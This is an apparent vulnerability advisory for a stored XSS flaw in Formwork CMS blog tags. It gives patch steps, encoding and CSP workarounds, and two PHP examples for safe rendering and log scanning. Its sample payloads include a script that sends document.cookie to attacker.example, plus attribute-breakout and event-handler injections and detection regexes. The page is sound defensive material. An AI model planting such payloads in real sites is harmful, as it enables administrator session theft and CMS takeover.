CVE-2025-65956

6.5 MEDIUM

📋 TL;DR

Formwork CMS versions before 2.2.0 have a stored cross-site scripting vulnerability in the blog tag field. An authenticated user whose account can edit blog posts can store a script payload in a post's tags; the payload executes in the browser of any administrator who views or edits that post. Because the script runs with the administrator's session, it can perform administrative actions on the attacker's behalf, giving a lower-privileged account privilege escalation within the administrative interface.

💻 Affected Systems

Products:
  • Formwork CMS
Versions: All versions prior to 2.2.0
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires attacker to have CMS credentials; affects administrative interface workflows.

📦 What is this software?

Formwork is an open-source flat-file CMS written in PHP, developed at github.com/getformwork/formwork. Site content, including blog posts and their tags, is stored as files rather than in a database, and the administrative panel is a PHP web application that renders that content for editors.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Administrator account compromise leading to full CMS takeover, data theft, or website defacement through injected malicious scripts.

🟠

Likely Case

Session hijacking of administrative users, credential capture through injected form handlers in the admin panel, or unauthorized CMS configuration changes made through the administrator's session.

🟢

If Mitigated

Limited impact where tag values are HTML-encoded on output and a strict Content Security Policy stops inline script in the admin panel; the stored payload still sits in the post data until it is removed, so it remains a finding to clean up.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access to CMS; stored XSS payloads are simple to craft.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.2.0

Vendor Advisory: https://github.com/getformwork/formwork/security/advisories/GHSA-7j46-f57w-76pj

Restart Required: No

Instructions:

1. Back up your Formwork installation, including the site content directory (Formwork is flat-file; there is no separate database to dump).
2. Download Formwork 2.2.0 or later from the GitHub releases.
3. Replace the existing application files with the new version.
4. Clear any cached data.
5. Verify that the admin panel and the public site work as before.
6. Review existing blog posts' tag fields for payloads stored before the upgrade; updating fixes the rendering but does not remove stored content.

🔧 Temporary Workarounds

Output Encoding (source modification)

Applies to: all

HTML-encode tag values at the point where the admin templates render them, rather than stripping tags at storage. Stripping at storage misses payloads that need no tag at all, such as a double quote followed by an event-handler attribute that breaks out of the value= attribute, and it alters legitimate tag text. Encoding on output covers both cases.

Modify the Formwork templates that output blog tag fields to pass each value through htmlspecialchars() with ENT_QUOTES (plus ENT_SUBSTITUTE and an explicit 'UTF-8' charset), matching the HTML context the value lands in. Posts that already contain payloads must be cleaned up separately.

Content Security Policy

Applies to: all

Send a strict CSP on admin panel responses so that a stored payload cannot execute as inline script. Any inline scripts the admin panel itself relies on will also be blocked, so first deploy the policy as Content-Security-Policy-Report-Only with a report-uri or report-to endpoint, confirm the admin UI still works, then enforce it. A CSP does not remove the stored payload; it only stops it from executing in browsers that honour the header.

Add the header "Content-Security-Policy: script-src 'self'" to admin panel responses (in the web server or reverse proxy configuration).
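The difference between stripping at storage and encoding at output, as an added PHP example that is not Formwork's own code: the template markup, the function names and the three tag values are constructed for illustration and do not come from the project.

```php
<?php
// Added example (not Formwork's own code): rendering a blog post's tags in an
// admin template. Tag values come from the stored post and are controlled by
// any account allowed to edit posts.
declare(strict_types=1);

// Constructed sample data: what an author account could store in the tag
// field of an unpatched installation.
$tags = [
    'php',
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    '" autofocus onfocus="alert(document.domain)',   // breaks out of the value= attribute
];

// Vulnerable pattern: the stored value is interpolated into HTML unchanged.
function renderTagsUnsafe(array $tags): string
{
    $out = '';
    foreach ($tags as $tag) {
        $out .= '<input type="text" name="tags[]" value="' . $tag . '">' . "\n";
    }
    return $out;
}

// Hardened pattern: encode at output for the HTML context the value lands in.
// ENT_QUOTES also encodes single quotes; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string, which would silently drop the tag.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderTagsSafe(array $tags): string
{
    $out = '';
    foreach ($tags as $tag) {
        $out .= '<input type="text" name="tags[]" value="' . e($tag) . '">' . "\n";
    }
    return $out;
}

// Why "strip at storage" is the weaker workaround: strip_tags() removes the
// <script> element but leaves the attribute-breakout payload untouched, since
// that payload contains no tag at all. strip_tags() also does not parse HTML,
// so a stray "<" in a legitimate tag can remove text the author meant to keep.
function stripAtStorage(array $tags): array
{
    return array_map('strip_tags', $tags);
}

echo "--- unsafe ---\n", renderTagsUnsafe($tags);
echo "--- strip_tags at storage, attribute breakout survives ---\n", renderTagsUnsafe(stripAtStorage($tags));
echo "--- encoded at output ---\n", renderTagsSafe($tags);
```

In the third block of output every tag stays inside its value="..." attribute as inert text, because the quote and angle brackets have become &quot;, &lt; and &gt;. The same e() helper is the right tool for any HTML text or quoted-attribute context; a value landing inside a script block or a URL needs a different encoder, so do not reuse it there.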

🧯 If You Can't Patch

  • Restrict administrative user access to trusted personnel only
  • Implement web application firewall rules to detect XSS payloads in blog tag fields

🔍 How to Verify

Check if Vulnerable:

Check Formwork version in admin panel or via composer.json; versions <2.2.0 are vulnerable.

Check Version:

Check composer.json for version or view admin panel footer

Verify Fix Applied:

After updating, on a staging copy, save a blog post with a tag such as <b>test</b> and a tag containing a double quote, then open the post in the admin edit view. The page source should show the values HTML-encoded (&lt;b&gt;test&lt;/b&gt;, &quot;) and the field should display the tag literally rather than as rendered markup. Remove the test post afterwards, and check existing posts for tag values stored before the upgrade, since updating does not remove them.

📡 Detection & Monitoring

Log Indicators:

  • Unusual blog tag entries containing script tags or JavaScript code
  • Multiple failed login attempts followed by blog post modifications

Network Indicators:

  • HTTP requests to the admin post edit endpoint whose tag parameter contains script payloads, including URL-encoded and mixed-case variants
  • Administrators' browsers contacting unfamiliar hosts shortly after loading the blog edit view; the injected script runs in the admin's browser, not on the server, so exfiltration of the session shows up as client-side traffic

SIEM Query:

source="formwork_logs" AND (message="*<script>*" OR message="*javascript:*")
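The wildcard query above matches only a literal lower-case <script> or javascript: string, so a payload that is URL-encoded, mixed-case, or built from an event-handler attribute passes it. The following PHP scan, an added example that is neither part of the original page nor Formwork code, decodes each submitted tag value first and applies several rules; the record layout and the five log records are constructed for illustration.

```php
<?php
// Added example, not part of the original page or of Formwork: scanning
// application-log records of tag submissions for XSS payloads. The record
// layout (ip, user, raw tags field) is an assumption for illustration.
declare(strict_types=1);

// Constructed sample records; "tags" is the raw, URL-encoded form field as it
// would appear in a request log. Only the second record contains a literal
// "<script>" after decoding.
$records = [
    ['ip' => '10.0.0.5', 'user' => 'editor',  'tags' => 'php%2Csecurity'],
    ['ip' => '10.0.0.9', 'user' => 'author2', 'tags' => '%3CSCRIPT%3Efetch(%22//attacker.example/%22%2Bdocument.cookie)%3C/script%3E'],
    ['ip' => '10.0.0.9', 'user' => 'author2', 'tags' => '%22+autofocus+onfocus%3D%22alert(document.domain)'],
    ['ip' => '10.0.0.9', 'user' => 'author2', 'tags' => 'news%2C+%3Cimg+src%3Dx+onerror%3Dalert(1)%3E'],
    ['ip' => '10.0.0.9', 'user' => 'author2', 'tags' => 'JaVaScRiPt%3Aalert(1)'],
];

// Rules are applied to the decoded value, case-insensitively. The
// event-handler rule is a heuristic (a tag literally named "online=..." would
// trip it), so tune it against real traffic before alerting on it.
const XSS_RULES = [
    'script-tag'    => '/<\s*script\b/i',
    'js-scheme'     => '/javascript\s*:/i',
    'event-handler' => '/\bon[a-z]+\s*=/i',
    'html-element'  => '/<\s*(img|svg|iframe|object|embed|body)\b/i',
];

function decodeField(string $raw): string
{
    // urldecode() handles %XX escapes and "+" for space, as browsers send
    // application/x-www-form-urlencoded bodies.
    $decoded = urldecode($raw);
    // Payloads are sometimes double-encoded to slip past a WAF; decode once
    // more when the result still contains percent escapes.
    if (preg_match('/%[0-9a-f]{2}/i', $decoded)) {
        $decoded = urldecode($decoded);
    }
    return $decoded;
}

function findSuspiciousTags(array $records): array
{
    $hits = [];
    foreach ($records as $i => $record) {
        $value   = decodeField($record['tags']);
        $matched = [];
        foreach (XSS_RULES as $name => $pattern) {
            if (preg_match($pattern, $value)) {
                $matched[] = $name;
            }
        }
        if ($matched !== []) {
            $hits[] = [
                'index' => $i,
                'user'  => $record['user'],
                'ip'    => $record['ip'],
                'rules' => $matched,
                'value' => $value,
            ];
        }
    }
    return $hits;
}

foreach (findSuspiciousTags($records) as $hit) {
    printf(
        "record %d user=%s ip=%s rules=%s value=%s\n",
        $hit['index'],
        $hit['user'],
        $hit['ip'],
        implode(',', $hit['rules']),
        $hit['value']
    );
}
```

Running it flags records 1 through 4 and leaves the benign "php,security" submission alone; record 3 is caught only by the event-handler rule and record 4 by the js-scheme rule, which is exactly the traffic the literal SIEM query misses. Grouping hits by user and source IP, as the loop output allows, also surfaces the "same low-privileged account repeatedly editing one post" pattern listed under log indicators.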
